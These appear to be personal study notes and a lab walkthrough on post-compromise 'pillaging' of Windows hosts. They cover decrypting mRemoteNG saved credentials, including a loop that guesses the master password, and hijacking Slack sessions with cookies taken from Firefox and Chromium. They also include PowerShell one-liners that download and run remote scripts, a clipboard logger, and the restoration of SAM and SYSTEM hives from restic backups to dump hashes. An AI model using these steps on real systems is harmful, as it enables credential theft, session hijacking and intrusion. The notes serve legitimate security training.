# Intro
- Pillaging = searching a compromised host for sensitive or otherwise useful information
- Potential data sources
    - Installed apps
    - Installed services
        - web servers
        - file shares
        - directory services
        - dbs
        - name servers
        - deployment services
        - CAs
        - source code mgmt servers
        - virtualization
        - messaging
        - monitoring and logging services
        - backups
    - Sensitive data
        - keylogging
        - screen capture
        - network pcap
        - previous audit reports
    - User info
        - history files and interesting docs
        - roles and privs
        - web browsers
        - messaging clients
# Enumerating Installed Apps
- Check `C:\Program Files` and `C:\Program Files (x86)` (quote the paths, since they contain spaces)
```cmd
dir "C:\Program Files"
dir "C:\Program Files (x86)"
```
```powershell
$INSTALLED = Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, InstallLocation
$INSTALLED += Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, InstallLocation
$INSTALLED | ?{ $_.DisplayName -ne $null } | sort-object -Property DisplayName -Unique | Format-Table -AutoSize
```
- From the above we find `mRemoteNG`, which saves connection info and credentials to a file called `confCons.xml`
- By default, the config file is located in `%USERPROFILE%\APPDATA\Roaming\mRemoteNG`
- When we `type C:\Users\julio\AppData\Roaming\mRemoteNG\confCons.xml`, we find an encrypted
- Let's attempt to decrypt with `mremoteng_decrypt.py`
```bash
python3 mremoteng_decrypt.py -s "<encrypted_string>"
```
- If we get an error, a custom master password may have been set; retry with the `-p` flag and the candidate password
```bash
python3 mremoteng_decrypt.py -s "<encrypted_string>" -p admin
```
- We can also loop over a short wordlist to attempt to guess the master password
```bash
# Try each wordlist entry as the master password; errors from wrong guesses are suppressed
while read -r password; do
    echo "$password"
    python3 mremoteng_decrypt.py -s "<encrypted_string>" -p "$password" 2>/dev/null
done < /usr/share/wordlists/fasttrack.txt
```
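The page describes `confCons.xml` as the file where mRemoteNG keeps connection details and credentials. The following is an added example (not mRemoteNG's code and not `mremoteng_decrypt.py`) that parses such a file and reports, per connection, the target, protocol, user and whether a password is stored, with the ciphertext masked, plus the file-level encryption settings (KDF iterations, full-file encryption) that decide how much the default master password protects. The sample document is constructed, and the attribute names are an assumption about mRemoteNG's `confCons.xml` layout.

```python
"""Inventory the connection entries stored in an mRemoteNG confCons.xml.

Added example, not mRemoteNG's or mremoteng_decrypt.py's code. Reports each
connection's target, protocol, username and whether a password is stored
(ciphertext masked), plus the file-level encryption settings. The document
below is constructed; attribute names are assumed to match confCons.xml.
"""
import xml.etree.ElementTree as ET

# Constructed sample in the shape of a confCons.xml (assumption, not a real file).
SAMPLE_CONFCONS = """<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections"
    Export="false" EncryptionEngine="AES" BlockCipherMode="GCM"
    KdfIterations="1000" FullFileEncryption="false"
    Protected="CONSTRUCTED-PROTECTED-BLOB==" ConfVersion="2.6">
  <Node Name="DC01" Type="Connection" Username="administrator"
        Domain="corp.local" Password="CONSTRUCTED-CIPHERTEXT-1=="
        Hostname="10.0.0.10" Protocol="RDP" Port="3389" />
  <Node Name="Jump hosts" Type="Container">
    <Node Name="web01" Type="Connection" Username="deploy" Domain=""
          Password="" Hostname="10.0.0.20" Protocol="SSH2" Port="22" />
  </Node>
</mrng:Connections>
"""


def file_settings(root):
    """Encryption parameters of the file itself (attributes on the root element)."""
    return {
        "engine": root.get("EncryptionEngine"),
        "mode": root.get("BlockCipherMode"),
        "kdf_iterations": int(root.get("KdfIterations", "0")),
        "full_file_encryption": root.get("FullFileEncryption") == "true",
    }


def inventory(xml_text):
    """Return (settings, entries) with one entry per Type="Connection" node."""
    root = ET.fromstring(xml_text)
    entries = []
    for node in root.iter("Node"):  # Node elements carry no namespace prefix
        if node.get("Type") != "Connection":
            continue  # folders are Type="Container"; nothing to report
        password = node.get("Password") or ""
        domain = node.get("Domain") or ""
        user = node.get("Username") or ""
        entries.append({
            "name": node.get("Name"),
            "host": node.get("Hostname"),
            "protocol": node.get("Protocol"),
            "port": node.get("Port"),
            "user": f"{domain}\\{user}" if domain else user,
            "stored_password": bool(password),
            # keep only a prefix so a report never carries the full ciphertext
            "password_preview": password[:8] + "..." if password else "",
        })
    return file_settings(root), entries


def main():
    settings, entries = inventory(SAMPLE_CONFCONS)
    print("file settings:", settings)
    for e in entries:
        flag = "STORED PASSWORD" if e["stored_password"] else "no password"
        print(f"{e['name']:<12} {e['protocol']:<5} {e['host']}:{e['port']} "
              f"user={e['user']!r} {flag} {e['password_preview']}")


if __name__ == "__main__":
    main()
```

Run against a real `confCons.xml` by passing its contents to `inventory()`; a file with `FullFileEncryption="false"` and entries flagged `STORED PASSWORD` is exactly the case the decryption steps above target, so those entries are the ones to rotate.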
---
# Abusing Cookies to Get Access to IM Clients
- Example IM clients include `Slack` and `Microsoft Teams`
- Multiple posts cover how `Slack` can be abused, such as [Abusing Slack for Offensive Operations](https://posts.specterops.io/abusing-slack-for-offensive-operations-2343237b9282) and [Phishing for Slack-tokens](https://thomfre.dev/post/2021/phishing-for-slack-tokens/)
## Extracting Cookies from Firefox
- Firefox saves the cookies in an SQLite database in a file named `cookies.sqlite`
- This file is in each user's APPDATA directory `%APPDATA%\Mozilla\Firefox\Profiles\<RANDOM>.default-release`
- The profile directory name has a random prefix, so we use a wildcard in PowerShell to copy the file
```powershell
copy $env:APPDATA\Mozilla\Firefox\Profiles\*.default-release\cookies.sqlite .
```
- After moving `cookies.sqlite` to Kali, we can use [cookieextractor.py](https://raw.githubusercontent.com/juliourena/plaintext/master/Scripts/cookieextractor.py) to extract cookies therefrom
```bash
python3 cookieextractor.py --dbpath "/home/plaintext/cookies.sqlite" --host slack --cookie d
```
- Now that we have the cookie, we can use a cookie-editing browser extension to add it to our browser
- For this example, we will use Firefox and the extension [Cookie-Editor](https://cookie-editor.cgagnier.ca/)
- Our target website is `slack.com`, and with the cookie in hand we can take over the user's session
- So let's navigate to `slack.com`; once the page loads, click on the icon for the Cookie-Editor extension and set the value of the `d` cookie to the value we got from the `cookieextractor.py` script ![[images/Pasted image 20260225195733.png]]
- Once the cookie is saved, refresh the page and confirm that we are now logged in as the user associated with the cookie ![[images/Pasted image 20260225195816.png]]
- Now we are logged in as the user and can click on `Launch Slack`
- We may get a prompt for credentials or other types of authentication information; we can repeat the above process and replace the cookie `d` with the same value we used to gain access the first time ![[images/Pasted image 20260225195901.png]]
- Once we complete this process for every website where we get a prompt, we need to refresh the browser, click on `Launch Slack` and use Slack in the browser
- After gaining access, we can use built-in functions to search for common words like passwords, credentials, PII, or any other information relevant to our assessment ![[images/Pasted image 20260225195946.png]]
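The Firefox steps above rely on `cookies.sqlite` holding cookie values in clear text. Below is an added example (not the `cookieextractor.py` script the page links) that builds a small constructed `moz_cookies` table in a temporary SQLite file and queries it the way the tool is invoked: by host substring and cookie name, skipping expired rows and reporting the remaining lifetime of each hit. Column names follow Firefox's `moz_cookies` schema, but only the subset used here is created; the rows and their values are constructed.

```python
"""Query a Firefox cookies.sqlite for a host's cookies.

Added example, not cookieextractor.py. Builds a constructed moz_cookies table
in a temporary SQLite file and queries it by host and cookie name. The point:
the value column is clear text, so read access to the profile directory equals
possession of every unexpired session stored there.
"""
import os
import sqlite3
import tempfile
import time

DAY = 86400


def build_sample_db(now=None):
    """Write a constructed cookies.sqlite to a temp file and return its path."""
    now = int(time.time()) if now is None else now
    fd, path = tempfile.mkstemp(suffix="-cookies.sqlite")
    os.close(fd)
    conn = sqlite3.connect(path)
    conn.execute("""CREATE TABLE moz_cookies (
        id INTEGER PRIMARY KEY, name TEXT, value TEXT, host TEXT, path TEXT,
        expiry INTEGER, isSecure INTEGER, isHttpOnly INTEGER)""")
    rows = [  # (name, value, host, path, expiry, isSecure, isHttpOnly), all constructed
        ("d", "xoxd-CONSTRUCTED-SESSION", ".slack.com", "/", now + 5 * 365 * DAY, 1, 1),
        ("b", "CONSTRUCTED-B", ".slack.com", "/", now + DAY, 1, 0),
        ("d", "CONSTRUCTED-OTHER", ".example.org", "/", now + DAY, 1, 1),
        ("old", "CONSTRUCTED-EXPIRED", ".slack.com", "/", now - 60, 1, 1),
    ]
    conn.executemany(
        "INSERT INTO moz_cookies (name, value, host, path, expiry, isSecure, isHttpOnly)"
        " VALUES (?, ?, ?, ?, ?, ?, ?)", rows)
    conn.commit()
    conn.close()
    return path


def find_cookies(db_path, host, name=None, include_expired=False, now=None):
    """Return matching cookies as dicts; each gets a days_left field."""
    now = int(time.time()) if now is None else now
    sql = ("SELECT name, value, host, path, expiry, isSecure, isHttpOnly "
           "FROM moz_cookies WHERE host LIKE ?")
    params = ["%" + host + "%"]
    if name is not None:
        sql += " AND name = ?"
        params.append(name)
    conn = sqlite3.connect(db_path)
    conn.row_factory = sqlite3.Row
    rows = [dict(r) for r in conn.execute(sql, params)]
    conn.close()
    hits = []
    for r in rows:
        r["days_left"] = (r["expiry"] - now) // DAY
        if include_expired or r["expiry"] > now:
            hits.append(r)
    return hits


def main():
    db = build_sample_db()
    try:
        for c in find_cookies(db, "slack"):
            print(f"{c['host']:<14} {c['name']:<4} secure={c['isSecure']} "
                  f"httponly={c['isHttpOnly']} expires in {c['days_left']}d "
                  f"value={c['value'][:12]}...")
    finally:
        os.remove(db)


if __name__ == "__main__":
    main()
```

Point `find_cookies()` at a copied `cookies.sqlite` to reproduce the page's `--host slack --cookie d` query; the `days_left` column shows why a long-lived `d` cookie is worth more to an attacker (and more worth revoking) than a one-day one.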
## Extracting Cookies from Chromium
- Chromium-based browsers also store their cookies in an SQLite database
- The difference relative to Firefox is that the cookie value is encrypted with the [Data Protection API (DPAPI)](https://docs.microsoft.com/en-us/dotnet/standard/security/how-to-use-data-protection)
- To get the cookie value, we'll need to perform a decryption routine from the session of the user we compromised using a tool like [SharpChromium](https://github.com/djhohnstein/SharpChromium)
- `SharpChromium` connects to the current user SQLite cookie database, decrypts the cookie value, and presents the result in JSON format
```powershell
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpChromium.ps1')
Invoke-SharpChromium -Command "cookies slack.com"
```
- If we get an error, it may be because the cookie path hardcoded in `SharpChromium` no longer matches the layout used by the current `chromium` version
- We can work around this by copying the cookie database to the legacy location
```powershell
copy "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Network\Cookies" "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Cookies"
```
- Now use `Invoke-SharpChromium` again
```powershell
Invoke-SharpChromium -Command "cookies slack.com"
```
---
# Clipboard
- In many cases, network admins use password managers to store their credentials and copy and paste passwords into login forms
- As a result, the clipboard can expose a significant amount of sensitive information
- We can use the [Invoke-Clipboard](https://github.com/inguardians/Invoke-Clipboard/blob/master/Invoke-Clipboard.ps1) script to start a logger to ultimately extract data from the user's clipboard
```powershell
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/inguardians/Invoke-Clipboard/master/Invoke-Clipboard.ps1')
Invoke-ClipboardLogger
```
- After waiting a while, check for captured info by running the logger again
```powershell
Invoke-ClipboardLogger
```
---
# Roles and Services
- Typical server roles and services include the following:
- File and Print Servers
- Web and Database Servers
- Certificate Authority Servers
- Source Code Management Servers
- Backup Servers
## Attacking Backup Servers
- If we gain access to a `backup system`, we may be able to review backups, search for interesting hosts and restore data
- In the example below, we will use [restic](https://restic.net/), a modern backup program that can back up files on Linux, BSD, Mac, and Windows
- For example, we could back up the directory `C:\xampp\htdocs\webapp` into a restic repository in `E:\restic\`
- Below we will initialize a new repository
```powershell
mkdir E:\restic2; restic.exe -r E:\restic2 init
```
- Next, create a backup
```powershell
$env:RESTIC_PASSWORD = 'Password'
restic.exe -r E:\restic2\ backup C:\SampleFolder
```
- Then, create a backup of a different directory using a VSS snapshot (`--use-fs-snapshot`), which lets restic read files that are otherwise locked
```powershell
restic.exe -r E:\restic2\ backup C:\Windows\System32\config --use-fs-snapshot
```
- Now, we can check backups saved to our repo
```powershell
restic.exe -r E:\restic2\ snapshots
```
- Finally, we can restore a backup based on an ID
```powershell
restic.exe -r E:\restic2\ restore 9971e881 --target C:\Restore
```
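The exercise further down this page restores `\Windows\System32\config` from a restic snapshot to get at the local password hashes, which is the risk a backup owner most needs to see in the snapshot list. The following is an added example (not restic's code and not from the page) that runs that check over the output of `restic snapshots --json`: it flags every snapshot whose paths are, contain, or sit inside a known credential store, so those snapshots can be given the same protection as the hosts they came from. The JSON is constructed, and the field names (`short_id`, `hostname`, `paths`, `time`) are assumed to match restic's JSON output.

```python
"""Flag restic snapshots that contain credential stores.

Added example, not restic's code or the page's. Scans `restic snapshots --json`
output for snapshots that include registry hives, NTDS or /etc/shadow. The
JSON below is constructed; field names are assumed to match restic's output.
"""
import json

# Constructed stand-in for `restic -r <repo> snapshots --json` output.
SAMPLE_SNAPSHOTS_JSON = json.dumps([
    {"time": "2026-02-25T10:00:00Z", "hostname": "WIN01", "username": "WIN01\\jeff",
     "paths": ["C:\\SampleFolder"], "short_id": "c0n57r01"},
    {"time": "2026-02-25T10:05:00Z", "hostname": "WIN01", "username": "WIN01\\jeff",
     "paths": ["C:\\Windows\\System32\\config"], "short_id": "c0n57r02"},
    {"time": "2026-02-25T10:10:00Z", "hostname": "lin01", "username": "root",
     "paths": ["/etc", "/home"], "short_id": "c0n57r03"},
    {"time": "2026-02-25T10:15:00Z", "hostname": "WIN01", "username": "WIN01\\jeff",
     "paths": ["C:\\xampp\\htdocs\\webapp"], "short_id": "c0n57r04"},
])

# Paths whose presence in a backup means the backup holds credential material.
SENSITIVE_PATHS = {
    "c:/windows/system32/config": "registry hives (SAM, SECURITY, SYSTEM)",
    "c:/windows/ntds/ntds.dit": "Active Directory database",
    "/etc/shadow": "Linux password hashes",
}


def norm(path):
    """Normalise Windows and POSIX paths to one lower-case, slash-separated form."""
    return path.replace("\\", "/").rstrip("/").lower() or "/"


def covers(snapshot_path, sensitive_path):
    """True if the snapshot path equals, is an ancestor of, or lies inside the sensitive path."""
    s, t = norm(snapshot_path), norm(sensitive_path)
    if s == "/":  # a root-level backup covers every POSIX path
        return t.startswith("/")
    return s == t or t.startswith(s + "/") or s.startswith(t + "/")


def flag_sensitive_snapshots(snapshots_json):
    """Return one finding dict per (snapshot path, sensitive store) overlap."""
    findings = []
    for snap in json.loads(snapshots_json):
        for p in snap.get("paths", []):
            for sensitive, reason in SENSITIVE_PATHS.items():
                if covers(p, sensitive):
                    findings.append({
                        "short_id": snap["short_id"],
                        "hostname": snap["hostname"],
                        "time": snap["time"],
                        "path": p,
                        "reason": reason,
                    })
    return findings


def main():
    for f in flag_sensitive_snapshots(SAMPLE_SNAPSHOTS_JSON):
        print(f"{f['short_id']} {f['hostname']:<6} {f['time']} {f['path']}: {f['reason']}")


if __name__ == "__main__":
    main()
```

Feed it real output with `restic -r <repo> snapshots --json > snaps.json` and `flag_sensitive_snapshots(open("snaps.json").read())`; a snapshot flagged here, combined with a repository password stored in a readable config file, is the exact combination the exercise on this page turns into local hashes.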
---
# Exercise
## login as `peter`
- `ping` test ![[images/Pasted image 20260225201844.png]]
- `nmap` scan ![[images/Pasted image 20260225201849.png]]
- `rdp` into target with given creds for `peter`
- light internal enum ![[images/Pasted image 20260225202112.png]]![[images/Pasted image 20260225202230.png]]
- check installed apps ![[images/Pasted image 20260225202032.png]]
- I see `xampp`, `slack`, and `mRemoteNG`
- Look at `mRemoteNG` config file and `type` ![[images/Pasted image 20260225202508.png]]
- `git clone mRemoteNG-Decrypt` on Kali ![[images/Pasted image 20260225202648.png]]
- now try decrypting password for `grace` ![[images/Pasted image 20260225202748.png]]
## login as `grace`
- light internal enum ![[images/Pasted image 20260225203147.png]]
- look for firefox `cookies.sqlite` and copy with
```powershell
copy $env:APPDATA\Mozilla\Firefox\Profiles\*.default-release\cookies.sqlite .
```
![[images/Pasted image 20260225203517.png]]
- reconnect with `rdp` such that we have a shared drive to move the db
- NOTE: ensure target Kali directory has 777 perms ![[images/Pasted image 20260225203951.png]]
```bash
sudo chmod 777 .
xfreerdp3 /v:10.129.203.122 /u:grace /p:<password> /dynamic-resolution /drive:linux,.
```
- now that we have `cookies.sqlite` on Kali, we need to `wget cookieextractor.py` ![[images/Pasted image 20260225204229.png]]
- next, on Kali, we can extract `slack` cookies from `cookies.sqlite` ![[images/Pasted image 20260225204511.png]]
- then, visit `slacktestapp.com` ![[images/Pasted image 20260225204649.png]]
- we need to import the cookie and save, then refresh ![[images/Pasted image 20260225204836.png]]
- oh wow now we have the flag and a password for `jeff`
## login as `jeff`
- we have access to an elevated shell Webmaster001!
- light internal enum ![[images/Pasted image 20260225205144.png]]
- We have `Backup Operators` membership and related privs
- Restore directory containing the files needed to obtain the password hashes for local users
- Look at `restic` snapshots using `Password` ![[images/Pasted image 20260225205458.png]]
- `backup.conf` on the desktop includes a line noting `restic.exe -r E:\restic snapshots` with password found therein ![[images/Pasted image 20260225210610.png]]
- try to restore the latest `\windows\system32\config` dir ![[images/Pasted image 20260225210733.png]]
- navigate to the mount point
- we have SAM, SECURITY, and SYSTEM hives here ![[images/Pasted image 20260225210913.png]]
- stand up an SMB server on Kali and move the above hives over ![[images/Pasted image 20260225211123.png]] ![[images/Pasted image 20260225211138.png]]
- now run `secretsdump.py` ![[images/Pasted image 20260225211229.png]]